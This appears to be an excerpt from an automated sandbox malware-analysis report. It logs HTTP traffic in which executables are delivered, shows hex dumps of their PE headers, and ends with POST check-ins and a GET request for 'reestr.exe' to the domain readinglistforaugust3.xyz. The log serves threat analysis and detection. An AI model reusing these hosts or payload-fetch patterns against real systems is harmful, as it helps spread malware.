00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Aug 2021 06:46:54 GMTContent-Type: application/x-msdos-programContent-Length: 109568Connection: keep-alivelast-modified: Mon, 23 Aug 2021 18:01:19 GMTetag: "1ac00-5ca3dcddc8b80"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4814Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=is2oWOO2oj%2BNqabws35LFSDZfrh5u84YrEC%2FATRWy%2FFcrqsmqoXeYCGEPtsP3gIx4o%2B030evq0RmcitB2lDIMdnVTjGqGvyHIJB8hGCilbEDjEojJKyOC9X%2BMfqKUXmbqQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 683aa04d5b781766-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 4b b7 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 01 00 00 0c 00 00 00 00 00 00 aa a6 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a6 01 00 4f 00 00 00 00 c0 01 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 3c a6 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 98 01 00 00 20 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 04 00 00 00 c0 01 00 00 08 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 04 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZK0 @ @XO< H.text `.rsrc@@.reloc@B
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:46:58 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:46:58 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:46:58 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:46:58 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:46:58 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:46:58 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:46:59 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:46:59 GMTCache-Control: max-age=86400X-Cache-Status: HITX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:47:01 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:47:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:47:01 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:47:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: readinglistforaugust3.xyz
